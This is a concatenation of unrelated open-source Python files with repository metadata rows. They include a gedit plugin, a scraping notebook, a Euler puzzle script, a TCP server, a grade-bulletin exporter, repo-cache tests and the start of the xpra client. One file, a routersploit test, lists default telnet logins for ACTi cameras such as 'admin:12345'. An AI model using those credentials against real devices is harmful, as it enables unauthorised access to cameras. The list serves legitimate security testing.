self._library = library
self._window = window
self._panel = panel
self._menu = menu
self._action_tools = {}
self.update()
def deactivate(self):
self.remove()
def remove(self):
self._menu.remove_all()
for name, tool in self._action_tools.items():
self._window.remove_action(name)
if tool.shortcut:
app = Gio.Application.get_default()
app.remove_accelerator(tool.shortcut)
self._action_tools = {}
def _insert_directory(self, directory, menu):
for d in sorted(directory.subdirs, key=lambda x: x.name.lower()):
submenu = Gio.Menu()
menu.append_submenu(d.name.replace('_', '__'), submenu)
section = Gio.Menu()
submenu.append_section(None, section)
self._insert_directory(d, section)
for tool in sorted(directory.tools, key=lambda x: x.name.lower()):
action_name = 'external-tool_%X_%X' % (id(tool), id(tool.name))
self._action_tools[action_name] = tool
action = Gio.SimpleAction(name=action_name)
action.connect('activate', capture_menu_action, self._window, self._panel, tool)
self._window.add_action(action)
item = Gio.MenuItem.new(tool.name.replace('_', '__'), "win.%s" % action_name)
item.set_attribute_value("hidden-when", GLib.Variant.new_string("action-disabled"))
menu.append_item(item)
if tool.shortcut:
app = Gio.Application.get_default()
app.add_accelerator(tool.shortcut, "win.%s" % action_name, None)
def update(self):
self.remove()
self._insert_directory(self._library.tree, self._menu)
self.filter(self._window.get_active_document())
def filter_language(self, language, item):
if not item.languages:
return True
if not language and 'plain' in item.languages:
return True
if language and (language.get_id() in item.languages):
return True
else:
return False
def filter(self, document):
if document is None:
titled = False
remote = False
language = None
else:
titled = document.get_location() is not None
remote = not document.is_local()
language = document.get_language()
states = {
'always': True,
'all' : document is not None,
'local': titled and not remote,
'remote': titled and remote,
'titled': titled,
'untitled': not titled,
}
for name, tool in self._action_tools.items():
action = self._window.lookup_action(name)
if action:
action.set_enabled(states[tool.applicability] and
self.filter_language(language, tool))
# FIXME: restore the launch of the manager on configure using PeasGtk.Configurable
class WindowActivatable(GObject.Object, Gedit.WindowActivatable):
__gtype_name__ = "ExternalToolsWindowActivatable"
window = GObject.property(type=Gedit.Window)
def __init__(self):
GObject.Object.__init__(self)
self._manager = None
self._manager_default_size = None
self.menu = None
def do_activate(self):
# Ugly hack... we need to get access to the activatable to update the menuitems
self.window._external_tools_window_activatable = self
self._library = ToolLibrary()
action = Gio.SimpleAction(name="manage_tools")
action.connect("activate", lambda action, parameter: self.open_dialog())
self.window.add_action(action)
self.gear_menu = self.extend_gear_menu("ext9")
item = Gio.MenuItem.new(_("Manage _External Tools..."), "win.manage_tools")
self.gear_menu.append_menu_item(item)
external_tools_submenu = Gio.Menu()
item = Gio.MenuItem.new_submenu(_("External _Tools"), external_tools_submenu)
self.gear_menu.append_menu_item(item)
external_tools_submenu_section = Gio.Menu()
external_tools_submenu.append_section(None, external_tools_submenu_section)
# Create output console
self._output_buffer = OutputPanel(self.plugin_info.get_data_dir(), self.window)
self.menu = ToolMenu(self._library, self.window, self._output_buffer, external_tools_submenu_section)
bottom = self.window.get_bottom_panel()
bottom.add_titled(self._output_buffer.panel, "GeditExternalToolsShellOutput", _("Tool Output"))
def do_update_state(self):
if self.menu is not None:
self.menu.filter(self.window.get_active_document())
def do_deactivate(self):
self.window._external_tools_window_activatable = None
self.menu.deactivate()
self.window.remove_action("manage_tools")
bottom = self.window.get_bottom_panel()
bottom.remove(self._output_buffer.panel)
def open_dialog(self):
if not self._manager:
self._manager = Manager(self.plugin_info.get_data_dir())
if self._manager_default_size:
self._manager.dialog.set_default_size(*self._manager_default_size)
self._manager.dialog.connect('destroy', self.on_manager_destroy)
self._manager.connect('tools-updated', self.on_manager_tools_updated)
window = Gio.Application.get_default().get_active_window()
self._manager.run(window)
return self._manager.dialog
def update_manager(self, tool):
if self._manager:
self._manager.tool_changed(tool, True)
def on_manager_destroy(self, dialog):
self._manager_default_size = self._manager.get_final_size()
self._manager = None
def on_manager_tools_updated(self, manager):
for window in Gio.Application.get_default().get_windows():
window._external_tools_window_activatable.menu.update()
# ex:ts=4:et:
| halfline/gedit | plugins/externaltools/tools/windowactivatable.py | Python | gpl-2.0 | 7,385 |
# -*- coding: utf-8 -*-
# <nbformat>3.0</nbformat>
# <headingcell level=1>
# Intercity Python API Development
# <codecell>
from bs4 import BeautifulSoup
import requests
import pickle
loadSite = requests.get('http://www.intercity.co.nz/')
siteData = loadSite.content
blehData = siteData.split()
blehData[0:20]
siteData.swapcase()
print siteData.find('a')
omgSite = BeautifulSoup(siteData)
linkZite = omgSite.text
# <codecell>
pickle.dump(linkZite, open('outpuz.txt', 'wb'))
# <codecell>
dizTxt = open('outpuz.txt', 'r')
dizTxt.read()
# <codecell>
def save(linkZite):
saveFilz = open('save.txt', 'w')
for linz in linkZite:
values = line.split()
savefilz.write(values)
saveFilz.close()
# <codecell>
print linkZite
# <codecell>
print omgSite.unwrap
# <codecell>
omgSite.encode
# <codecell>
savzSite = omgSite.find_all(id=True)
# <codecell>
sortSite = linkSite[0:30]
# <codecell>
print daSite.next_element
# <codecell>
daSite = sortSite[15]
# <codecell>
linkSite = omgSite.find_all('a')
# <codecell>
saveLinkz = open('htmldoc', 'w')
saveLinkz.write(siteData)
saveLinkz.close()
# <codecell>
openLinkz = open('htmldoc', 'r')
openLinkz.read()
# <codecell>
print omgSite.extract()
# <codecell>
print omgSite.setup
# <codecell>
print omgSite.title
# <codecell>
print omgSite.wrap
# <codecell>
print omgSite.body
# <codecell>
print omgSite.head
# <codecell>
print omgSite.currentTag()
# <codecell>
print omgSite.prettify
# <codecell>
# <codecell>
# <codecell>
print loadSite.url
# <codecell>
beaut = BeautifulSoup(loadSite)
# <codecell>
reTweetz = open('testing.txt', 'w')
reTweetz.write('Fixed request')
reTweetz.close()
# <codecell>
daTweetz = open('testing.txt', 'r')
daTweetz.read()
# <codecell>
print diemLink
# <codecell>
for data in loadSite:
mixData = BeautifulSoup(data)
diemLink = mixData.a
print diemLink
seioLink = mixData.findAll('a')
print seioLink
print(mixData.get_text())
# <codecell>
mixOpen = open('outputz', 'r')
mixOpen.read()
# <codecell>
%%bash
git add .
git commit -m daTweetz
# <codecell>
%%bash
git push https://github.com/wcmckee/intercity
# <codecell>
testing = []
# <codecell>
testing.append(daTweetz)
# <codecell>
print testing
# <codecell>
for site in loadSite:
# <codecell>
for site in loadSite:
daLink = []
dafile = open('output', 'w')
daLink.append(site)
inter = BeautifulSoup(site)
daLink.append(inter)
geter = inter.text
daLink.append(geter)
beuLink = BeautifulSoup(daLink[0])
print beuLink.a
# <codecell>
for site in loadSite:
print'print site'
inter = BeautifulSoup(site)
print inter.titlefor site in loadSite:
print'print site'
inter = BeautifulSoup(site)
print inter.title
# <codecell>
for site in loadSite:
print'print site'
inter = BeautifulSoup(site)
print inter.title
# <codecell>
# <codecell>
print inter
# <codecell>
print inter
# <headingcell level=2>
# Timetable
# <codecell>
loadUrl = requests.get('http://www.intercity.co.nz/travel-info/timetable/')
# <codecell>
for da in loadUrl:
print da.title()
# <codecell>
selz = BeautifulSoup(da)
# <codecell>
print selz.title
# <codecell>
timez = BeautifulSoup(loadUrl)
# <codecell>
nakedSite = requests.get('http://nakedbus.com/nz/bus/')
# <codecell>
for naked in nakedSite:
print naked
# <codecell>
# <codecell>
| wcmckee/wcmckee-notebook | webData.py | Python | gpl-2.0 | 3,474 |
am = imp.load_source( 'am', 'artifact-manager' )
| paulovn/artifact-manager | test/__init__.py | Python | gpl-2.0 | 50 |
#!/usr/bin/python
y = '''75
95 64
17 47 82
18 35 87 10
20 04 82 47 65
19 01 23 75 03 34
88 02 77 73 07 63 67
99 65 04 28 06 16 70 92
41 41 26 56 83 40 80 70 33
41 48 72 33 47 32 37 16 94 29
53 71 44 65 25 43 91 52 97 51 14
70 11 33 28 77 73 17 78 39 68 17 57
91 71 52 38 17 14 91 43 58 50 27 29 48
63 66 04 68 89 53 67 30 73 16 69 87 40 31
04 62 98 27 23 09 70 98 73 93 38 53 60 04 23'''
i = 0
a = {}
for line in y.split('\n'):
l = line.split()
a[i] = l
i += 1
x_pos = 0
tally = 0
for y_pos in range(0, 14):
tally += int(a[y_pos][x_pos])
print int(a[y_pos][x_pos])
next_l = int(a[y_pos+1][x_pos])
next_r = int(a[y_pos+1][x_pos+1])
if next_l < next_r:
x_pos += 1
print int(a[y_pos+1][x_pos])
tally += int(a[y_pos+1][x_pos])
print tally
| generica/euler | 18.py | Python | gpl-2.0 | 782 |
#aqui se creara el servidor para comenzar la conexion
import SocketServer
class MiTcpHandler(SocketServer.BaseRequestHandler):
#esto se llamara en cada conexion
def handle(self):
#se usa para recibir desde el cliente
self.oracion=self.request.recv(1024).strip()
#esto leera la cantidad de caracteres que tienen la oracion
self.num=len(self.oracion)
self.request.send(str(self.num))
print("Cliente 1 dice:",self.oracion,"caracteres recibidos : ",self.num)
def main():
print("Servidor 1.0\n")
host="localhost"
port=9999
server1=SocketServer.TCPServer((host,port),MiTcpHandler)
print("Servidor Corriendo...")
server1.serve_forever()#fucnionara hasta que se cierre el programa
main()
| hdrtronic/Socket_python | Servidor.py | Python | gpl-2.0 | 770 |
from routersploit.modules.creds.cameras.acti.telnet_default_creds import Exploit
def test_check_success(generic_target):
""" Test scenario - testing against Telnet server """
exploit = Exploit()
assert exploit.target == ""
assert exploit.port == 23
assert exploit.threads == 1
assert exploit.defaults == ["admin:12345", "admin:123456", "Admin:12345", "Admin:123456"]
assert exploit.stop_on_success is True
assert exploit.verbosity is True
exploit.target = generic_target.host
exploit.port = generic_target.port
assert exploit.check() is True
assert exploit.check_default() is not None
assert exploit.run() is None
| dasseclab/dasseclab | clones/routersploit/tests/creds/cameras/acti/test_telnet_default_creds.py | Python | gpl-2.0 | 672 |
# HRGRN WebServices
# Copyright (C) 2016 Xinbin Dai, Irina Belyaeva
# This file is part of HRGRN WebServices API.
#
# HRGRN API is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 2 of the License, or
# (at your option) any later version.
# HRGRN API is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with HRGRN API. If not, see <http://www.gnu.org/licenses/>.
"""
Main Module
"""
import json
import requests
import logging
import timer as timer
from requests.exceptions import ConnectionError
from requests import Session
import service as svc
import request_handler as rh
logging.basicConfig(level=logging.INFO)
log = logging.getLogger(__name__)
log.setLevel(logging.INFO)
# This function acts as a list endpoint
def list(args):
session = Session()
# get service url
svc_url = svc.get_svc_base_url()
params = {'listall': 'T', 'format':'json'}
try:
with timer.Timer() as t:
log.info("Service URL:" + svc_url)
# execute request
response = rh.build_payload(svc_url, params, session)
log.debug(response)
if (response):
for item in response:
print json.dumps(item, indent=3)
print '---'
else:
raise Exception("Response cannot be null!")
except ValueError as e:
error_msg = "ValueError Exception:" + e.message
log.error(error_msg, exc_info=True)
raise Exception(error_msg)
except requests.exceptions.HTTPError as e:
error_msg = "HTTPError Exception:" + e.message
log.error(error_msg, exc_info=True)
raise Exception(error_msg)
except ConnectionError as e:
error_msg = "ConnectionError Exception:" + e.message
log.error(error_msg, exc_info=True)
raise Exception(error_msg)
except Exception as e:
error_msg = "GenericError Exception:" + e.message
log.error(error_msg, exc_info=True)
raise Exception(error_msg)
finally:
log.info('Request took %.03f sec.' % t.interval)
| Arabidopsis-Information-Portal/hrgrn_webservices | services/hrgrn_list_network/main.py | Python | gpl-2.0 | 2,479 |
# ------------------------------------------------------------
# Developping with MicroPython in an async way
#
# ------------------------------------------------------------
# === asyncio tests ===
# ------------------------------------------------------------
print("==== /test/asyncio/test_createkilldye.py")
import logging
log = logging.getlogger("test")
logs = logging.getlogger("scheduler")
logs.setLevel(logging.TRACE)
logging.setGlobal(logging.DEBUG)
loge = logging.getlogger("esp")
loge.setLevel(logging.INFO)
import utime as time,sys
import asyncio
from neopixels import Neopixels
neo = Neopixels(13,4)
neo.brightness = 50
neo.clearBuffer()
# ------------------------------------------------------------
# === Example ===
# ------------------------------------------------------------
total = 0
# 4 tasks
def led0():
log.info("Task led0 created!")
yield
while True:
neo.toggleR( 0,80 )
neo.writeBuffer()
yield
log.info("Task led0 dies!")
def led1():
yield
while True:
neo.toggleG( 1,80 )
neo.writeBuffer()
yield
log.info("Task led1 dies!")
def led2():
yield
while True:
neo.toggleB( 2,80 )
neo.writeBuffer()
yield
log.info("Task led2 dies!")
def led3():
yield
while True:
neo.toggleR( 3,80 )
neo.writeBuffer()
yield
log.info("Task led3 dies!")
def master_of_universe():
yield
log.info("Creating task led0. Red led goes flashing fast!")
tid = yield asyncio.CreateTask( led0(), period = 100, prio = 11 )
log.info("Kill task led0 with tid %d. Red led stops flashing!",tid)
yield asyncio.KillTask(tid)
log.info("Kill the os itself!")
yield asyncio.KillOs()
log.info("Task master_of_universe is ready!")
now = time.ticks_ms()
print (now)
# Run them
sched = asyncio.sched
sched.task(led1(), period = 300, time2run = 200)
sched.task(led2(), period = 700, time2run = 300)
sched.task(led3(), period = 4000, time2run = 4000)
sched.task(master_of_universe(), period = 4000, time2run = 4000 )
log.info("test creating killing tasks")
sched.mainloop()
| smeenka/esp32 | lolin32/test/asyncio/test_createkilldye.py | Python | gpl-2.0 | 2,215 |
# -*- mode: python -*-
# -*- coding: iso8859-15 -*-
##############################################################################
#
# Gestion scolarite IUT
#
# Copyright (c) 2001 - 2013 Emmanuel Viennet. All rights reserved.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
#
# Emmanuel Viennet emmanuel.viennet@viennet.net
#
##############################################################################
"""Génération du bulletin en format JSON (beta, non completement testé)
"""
from notes_table import *
import sco_photos
import ZAbsences
import sco_bulletins
# -------- Bulletin en JSON
import mx
class ScoDocJSONEncoder(json.JSONEncoder):
def default(self, o):
# horrible hack pour encoder les dates
if str(type(o)) == "<type 'mx.DateTime.DateTime'>":
return o.strftime("%Y-%m-%dT%H:%M:%S")
else:
log('not mx: %s' % type(o))
return json.JSONEncoder.default(self, o)
def make_json_formsemestre_bulletinetud(
context, formsemestre_id, etudid, REQUEST=None,
xml_with_decisions=False, version='long',
force_publishing=False # force publication meme si semestre non publie sur "portail"
):
"""Renvoie bulletin en chaine JSON"""
d = formsemestre_bulletinetud_published_dict(
context, formsemestre_id, etudid,
force_publishing=force_publishing,
REQUEST=REQUEST,
xml_with_decisions=xml_with_decisions, version=version)
if REQUEST:
REQUEST.RESPONSE.setHeader('content-type', JSON_MIMETYPE)
return json.dumps(d, cls=ScoDocJSONEncoder, encoding=SCO_ENCODING)
# (fonction séparée: n'utilise pas formsemestre_bulletinetud_dict()
# pour simplifier le code, mais attention a la maintenance !)
#
def formsemestre_bulletinetud_published_dict(
context, formsemestre_id, etudid,
force_publishing=False,
xml_nodate=False,
REQUEST=None,
xml_with_decisions=False, # inclue les decisions même si non publiées
version='long'
):
"""Dictionnaire representant les informations _publiees_ du bulletin de notes
Utilisé pour JSON, devrait l'être aussi pour XML. (todo)
"""
d = {}
sem = context.get_formsemestre(formsemestre_id)
if sem['bul_hide_xml'] == '0' or force_publishing:
published=1
else:
published=0
if xml_nodate:
docdate = ''
else:
docdate = datetime.datetime.now().isoformat()
d.update( etudid=etudid, formsemestre_id=formsemestre_id,
date=docdate,
publie=published,
etape_apo=sem['etape_apo'] or '',
etape_apo2=sem['etape_apo2'] or '',
etape_apo3=sem['etape_apo3'] or '',
etape_apo4=sem['etape_apo4'] or ''
)
# Infos sur l'etudiant
etudinfo = context.getEtudInfo(etudid=etudid,filled=1)[0]
d['etudiant'] = dict(
etudid=etudid, code_nip=etudinfo['code_nip'], code_ine=etudinfo['code_ine'],
nom=quote_xml_attr(etudinfo['nom']),
prenom=quote_xml_attr(etudinfo['prenom']),
sexe=quote_xml_attr(etudinfo['sexe']),
photo_url=quote_xml_attr(sco_photos.etud_photo_url(context, etudinfo)),
email=quote_xml_attr(etudinfo['email']))
# Disponible pour publication ?
if not published:
return d # stop !
# Groupes:
partitions = sco_groups.get_partitions_list(context, formsemestre_id, with_default=False)
partitions_etud_groups = {} # { partition_id : { etudid : group } }
for partition in partitions:
pid=partition['partition_id']
partitions_etud_groups[pid] = sco_groups.get_etud_groups_in_partition(context, pid)
nt = context._getNotesCache().get_NotesTable(context, formsemestre_id) #> toutes notes
ues = nt.get_ues()
modimpls = nt.get_modimpls()
nbetuds = len(nt.rangs)
mg = fmt_note(nt.get_etud_moy_gen(etudid))
if nt.get_moduleimpls_attente() or context.get_preference('bul_show_rangs', formsemestre_id) == 0:
# n'affiche pas le rang sur le bulletin s'il y a des
# notes en attente dans ce semestre
rang = ''
rang_gr = {}
ninscrits_gr = {}
else:
rang = str(nt.get_etud_rang(etudid))
rang_gr, ninscrits_gr, gr_name = sco_bulletins.get_etud_rangs_groups(
context, etudid, formsemestre_id, partitions, partitions_etud_groups, nt)
d['note'] = dict( value=mg, min=fmt_note(nt.moy_min), max=fmt_note(nt.moy_max), moy=fmt_note(nt.moy_moy) )
d['rang'] = dict( value=rang, ninscrits=nbetuds )
d['rang_group'] = []
if rang_gr:
for partition in partitions:
d['rang_group'].append( dict(
group_type=partition['partition_name'],
group_name=gr_name[partition['partition_id']],
value=rang_gr[partition['partition_id']],
ninscrits=ninscrits_gr[partition['partition_id']] ))
d['note_max'] = dict( value=20 ) # notes toujours sur 20
d['bonus_sport_culture'] = dict( value=nt.bonus[etudid] )
# Liste les UE / modules /evals
d['ue'] = []
d['ue_capitalisee'] = []
for ue in ues:
ue_status = nt.get_etud_ue_status(etudid, ue['ue_id'])
u = dict( id=ue['ue_id'],
numero=quote_xml_attr(ue['numero']),
acronyme=quote_xml_attr(ue['acronyme']),
titre=quote_xml_attr(ue['titre']),
note = dict(value=fmt_note(ue_status['cur_moy_ue']),
min=fmt_note(ue['min']), max=fmt_note(ue['max'])),
rang = str(nt.ue_rangs[ue['ue_id']][0][etudid]),
effectif = str(nt.ue_rangs[ue['ue_id']][1] - nt.nb_demissions)
)
d['ue'].append(u)
u['module'] = []
# Liste les modules de l'UE
ue_modimpls = [ mod for mod in modimpls if mod['module']['ue_id'] == ue['ue_id'] ]
for modimpl in ue_modimpls:
mod_moy = fmt_note(nt.get_etud_mod_moy(modimpl['moduleimpl_id'], etudid))
if mod_moy == 'NI': # ne mentionne pas les modules ou n'est pas inscrit
continue
mod = modimpl['module']
#if mod['ects'] is None:
# ects = ''
#else:
# ects = str(mod['ects'])
modstat = nt.get_mod_stats(modimpl['moduleimpl_id'])
m = dict(
id=modimpl['moduleimpl_id'], code=mod['code'],
coefficient=mod['coefficient'],
numero=mod['numero'],
titre=quote_xml_attr(mod['titre']),
abbrev=quote_xml_attr(mod['abbrev']),
# ects=ects, ects des modules maintenant inutilisés
note = dict( value=mod_moy )
)
m['note'].update(modstat)
for k in ('min', 'max', 'moy'): # formatte toutes les notes
m['note'][k] = fmt_note(m['note'][k])
u['module'].append(m)
if context.get_preference('bul_show_mod_rangs', formsemestre_id):
m['rang'] = dict( value=nt.mod_rangs[modimpl['moduleimpl_id']][0][etudid] )
m['effectif'] = dict( value=nt.mod_rangs[modimpl['moduleimpl_id']][1] )
# --- notes de chaque eval:
evals = nt.get_evals_in_mod(modimpl['moduleimpl_id'])
m['evaluation'] = []
if version != 'short':
for e in evals:
if e['visibulletin'] == '1' or version == 'long':
val = e['notes'].get(etudid, {'value':'NP'})['value'] # NA si etud demissionnaire
val = fmt_note(val, note_max=e['note_max'] )
m['evaluation'].append( dict(
jour=DateDMYtoISO(e['jour'], null_is_empty=True),
heure_debut=TimetoISO8601(e['heure_debut'], null_is_empty=True),
heure_fin=TimetoISO8601(e['heure_fin'], null_is_empty=True),
coefficient=e['coefficient'],
evaluation_type=e['evaluation_type'],
description=quote_xml_attr(e['description']),
note = val
))
# Evaluations incomplètes ou futures:
complete_eval_ids = Set( [ e['evaluation_id'] for e in evals ] )
if context.get_preference('bul_show_all_evals', formsemestre_id):
all_evals = context.do_evaluation_list(args={ 'moduleimpl_id' : modimpl['moduleimpl_id'] })
all_evals.reverse() # plus ancienne d'abord
for e in all_evals:
if e['evaluation_id'] not in complete_eval_ids:
m['evaluation'].append( dict(
jour=DateDMYtoISO(e['jour'], null_is_empty=True),
heure_debut=TimetoISO8601(e['heure_debut'], null_is_empty=True),
heure_fin=TimetoISO8601(e['heure_fin'], null_is_empty=True),
coefficient=e['coefficient'],
description=quote_xml_attr(e['description']),
incomplete='1') )
# UE capitalisee (listee seulement si meilleure que l'UE courante)
if ue_status['is_capitalized']:
d['ue_capitalisee'].append( dict(
id=ue['ue_id'],
numero=quote_xml_attr(ue['numero']),
acronyme=quote_xml_attr(ue['acronyme']),
titre=quote_xml_attr(ue['titre']),
note = fmt_note(ue_status['moy']),
coefficient_ue = fmt_note(ue_status['coef_ue']),
date_capitalisation = DateDMYtoISO(ue_status['event_date'])
))
# --- Absences
if context.get_preference('bul_show_abs', formsemestre_id):
debut_sem = DateDMYtoISO(sem['date_debut'])
fin_sem = DateDMYtoISO(sem['date_fin'])
AbsEtudSem = ZAbsences.getAbsSemEtud(context, formsemestre_id, etudid)
nbabs = AbsEtudSem.CountAbs()
nbabsjust = AbsEtudSem.CountAbsJust()
d['absences'] = dict(nbabs=nbabs, nbabsjust=nbabsjust)
# --- Decision Jury
if context.get_preference('bul_show_decision', formsemestre_id) or xml_with_decisions:
infos, dpv = sco_bulletins.etud_descr_situation_semestre(
context, etudid, formsemestre_id, format='xml',
show_uevalid=context.get_preference('bul_show_uevalid',formsemestre_id))
d['situation'] = quote_xml_attr(infos['situation'])
if dpv:
decision = dpv['decisions'][0]
etat = decision['etat']
if decision['decision_sem']:
code = decision['decision_sem']['code']
else:
code = ''
d['decision'] = dict( code=code, etat=etat)
d['decision_ue'] = []
if decision['decisions_ue']: # and context.get_preference('bul_show_uevalid', formsemestre_id): always publish (car utile pour export Apogee)
for ue_id in decision['decisions_ue'].keys():
ue = context.do_ue_list({ 'ue_id' : ue_id})[0]
d['decision_ue'].append(dict(
ue_id=ue['ue_id'],
numero=quote_xml_attr(ue['numero']),
acronyme=quote_xml_attr(ue['acronyme']),
titre=quote_xml_attr(ue['titre']),
code=decision['decisions_ue'][ue_id]['code'],
ects=quote_xml_attr(ue['ects'] or '')
))
d['autorisation_inscription'] = []
for aut in decision['autorisations']:
d['autorisation_inscription'].append(dict( semestre_id=aut['semestre_id'] ))
else:
d['decision'] = dict( code='', etat='DEM' )
# --- Appreciations
cnx = context.GetDBConnexion()
apprecs = scolars.appreciations_list(
cnx,
args={'etudid':etudid, 'formsemestre_id' : formsemestre_id } )
d['appreciation'] = []
for app in apprecs:
d['appreciation'].append( dict( comment=quote_xml_attr(app['comment']), date=DateDMYtoISO(app['date'])) )
#
return d
| denys-duchier/Scolar | sco_bulletins_json.py | Python | gpl-2.0 | 13,221 |
# Copyright (C) 2012-2015 Codethink Limited
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; version 2 of the License.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program. If not, see <http://www.gnu.org/licenses/>.
import unittest
import urllib2
import os
import cliapp
import fs.memoryfs
import morphlib
import morphlib.gitdir_tests
class FakeApplication(object):
def __init__(self):
self.settings = {
'verbose': True
}
def status(self, msg):
pass
class LocalRepoCacheTests(unittest.TestCase):
def setUp(self):
aliases = ['upstream=git://example.com/#example.com:%s.git']
repo_resolver = morphlib.repoaliasresolver.RepoAliasResolver(aliases)
tarball_base_url = 'http://lorry.example.com/tarballs/'
self.reponame = 'upstream:reponame'
self.repourl = 'git://example.com/reponame'
escaped_url = 'git___example_com_reponame'
self.tarball_url = '%s%s.tar' % (tarball_base_url, escaped_url)
self.cachedir = '/cache/dir'
self.cache_path = '%s/%s' % (self.cachedir, escaped_url)
self.remotes = {}
self.fetched = []
self.removed = []
self.lrc = morphlib.localrepocache.LocalRepoCache(
FakeApplication(), self.cachedir, repo_resolver, tarball_base_url)
self.lrc.fs = fs.memoryfs.MemoryFS()
self.lrc._git = self.fake_git
self.lrc._fetch = self.not_found
self.lrc._mkdtemp = self.fake_mkdtemp
self.lrc._new_cached_repo_instance = self.new_cached_repo_instance
self._mkdtemp_count = 0
def fake_git(self, args, **kwargs):
if args[0] == 'clone':
self.assertEqual(len(args), 5)
remote = args[3]
local = args[4]
self.remotes['origin'] = {'url': remote, 'updates': 0}
self.lrc.fs.makedir(local, recursive=True)
elif args[0:2] == ['remote', 'set-url']:
remote = args[2]
url = args[3]
self.remotes[remote] = {'url': url}
elif args[0:2] == ['config', 'remote.origin.url']:
remote = 'origin'
url = args[2]
self.remotes[remote] = {'url': url}
elif args[0:2] == ['config', 'remote.origin.mirror']:
remote = 'origin'
elif args[0:2] == ['config', 'remote.origin.fetch']:
remote = 'origin'
else:
raise NotImplementedError()
def fake_mkdtemp(self, dirname):
thing = "foo"+str(self._mkdtemp_count)
self._mkdtemp_count += 1
self.lrc.fs.makedir(dirname+"/"+thing)
return thing
def new_cached_repo_instance(self, *args):
with morphlib.gitdir_tests.allow_nonexistant_git_repos():
return morphlib.cachedrepo.CachedRepo(
FakeApplication(), *args)
def not_found(self, url, path):
raise cliapp.AppException('Not found')
def test_has_not_got_shortened_repo_initially(self):
self.assertFalse(self.lrc.has_repo(self.reponame))
def test_has_not_got_absolute_repo_initially(self):
self.assertFalse(self.lrc.has_repo(self.repourl))
def test_caches_shortened_repository_on_request(self):
self.lrc.cache_repo(self.reponame)
self.assertTrue(self.lrc.has_repo(self.reponame))
self.assertTrue(self.lrc.has_repo(self.repourl))
def test_caches_absolute_repository_on_request(self):
self.lrc.cache_repo(self.repourl)
self.assertTrue(self.lrc.has_repo(self.reponame))
self.assertTrue(self.lrc.has_repo(self.repourl))
def test_cachedir_does_not_exist_initially(self):
self.assertFalse(self.lrc.fs.exists(self.cachedir))
def test_creates_cachedir_if_missing(self):
self.lrc.cache_repo(self.repourl)
self.assertTrue(self.lrc.fs.exists(self.cachedir))
def test_happily_caches_same_repo_twice(self):
self.lrc.cache_repo(self.repourl)
self.lrc.cache_repo(self.repourl)
def test_fails_to_cache_when_remote_does_not_exist(self):
def fail(args, **kwargs):
self.lrc.fs.makedir(args[4])
raise cliapp.AppException('')
self.lrc._git = fail
self.assertRaises(morphlib.localrepocache.NoRemote,
self.lrc.cache_repo, self.repourl)
def test_does_not_mind_a_missing_tarball(self):
self.lrc.cache_repo(self.repourl)
self.assertEqual(self.fetched, [])
def test_fetches_tarball_when_it_exists(self):
self.lrc._fetch = lambda url, path: self.fetched.append(url)
self.unpacked_tar = ""
self.mkdir_path = ""
with morphlib.gitdir_tests.monkeypatch(
morphlib.cachedrepo.CachedRepo, 'update', lambda self: None):
self.lrc.cache_repo(self.repourl)
self.assertEqual(self.fetched, [self.tarball_url])
self.assertFalse(self.lrc.fs.exists(self.cache_path + '.tar'))
self.assertEqual(self.remotes['origin']['url'], self.repourl)
def test_gets_cached_shortened_repo(self):
self.lrc.cache_repo(self.reponame)
cached = self.lrc.get_repo(self.reponame)
self.assertTrue(cached is not None)
def test_gets_cached_absolute_repo(self):
self.lrc.cache_repo(self.repourl)
cached = self.lrc.get_repo(self.repourl)
self.assertTrue(cached is not None)
def test_get_repo_raises_exception_if_repo_is_not_cached(self):
self.assertRaises(Exception, self.lrc.get_repo, self.repourl)
def test_escapes_repourl_as_filename(self):
escaped = self.lrc._escape(self.repourl)
self.assertFalse('/' in escaped)
def test_noremote_error_message_contains_repo_name(self):
e = morphlib.localrepocache.NoRemote(self.repourl, [])
self.assertTrue(self.repourl in str(e))
def test_avoids_caching_local_repo(self):
self.lrc.fs.makedir('/local/repo', recursive=True)
self.lrc.cache_repo('file:///local/repo')
cached = self.lrc.get_repo('file:///local/repo')
assert cached.path == '/local/repo'
| nuxeh/morph | morphlib/localrepocache_tests.py | Python | gpl-2.0 | 6,502 |
# This file is part of Parti.
# Copyright (C) 2008 Nathaniel Smith <njs@pobox.com>
# Parti is released under the terms of the GNU GPL v2, or, at your option, any
# later version. See the file COPYING for details.
import gobject
import sys
import os
import socket
import time
from optparse import OptionParser
import logging
from subprocess import Popen, PIPE
import xpra
from xpra.bencode import bencode
from xpra.dotxpra import DotXpra
from xpra.platform import (XPRA_LOCAL_SERVERS_SUPPORTED,
DEFAULT_SSH_CMD,
GOT_PASSWORD_PROMPT_SUGGESTION)
from xpra.protocol import TwoFileConnection, SocketConnection
def nox():
if "DISPLAY" in os.environ:
del os.environ["DISPLAY"]
# This is an error on Fedora/RH, so make it an error everywhere so it will
# be noticed:
import warnings
warnings.filterwarnings("error", "could not open display")
def main(script_file, cmdline):
#################################################################
## NOTE NOTE NOTE
##
## If you modify anything here, then remember to update the man page
## (xpra.1) as well!
##
## NOTE NOTE NOTE
#################################################################
if XPRA_LOCAL_SERVERS_SUPPORTED:
start_str = "\t%prog start DISPLAY\n"
list_str = "\t%prog list\n"
upgrade_str = "\t%prog upgrade DISPLAY"
note_str = ""
else:
start_str = ""
list_str = ""
upgrade_str = ""
note_str = "(This xpra install does not support starting local servers.)"
parser = OptionParser(version="xpra v%s" % xpra.__version__,
usage="".join(["\n",
start_str,
"\t%prog attach [DISPLAY]\n",
"\t%prog stop [DISPLAY]\n",
list_str,
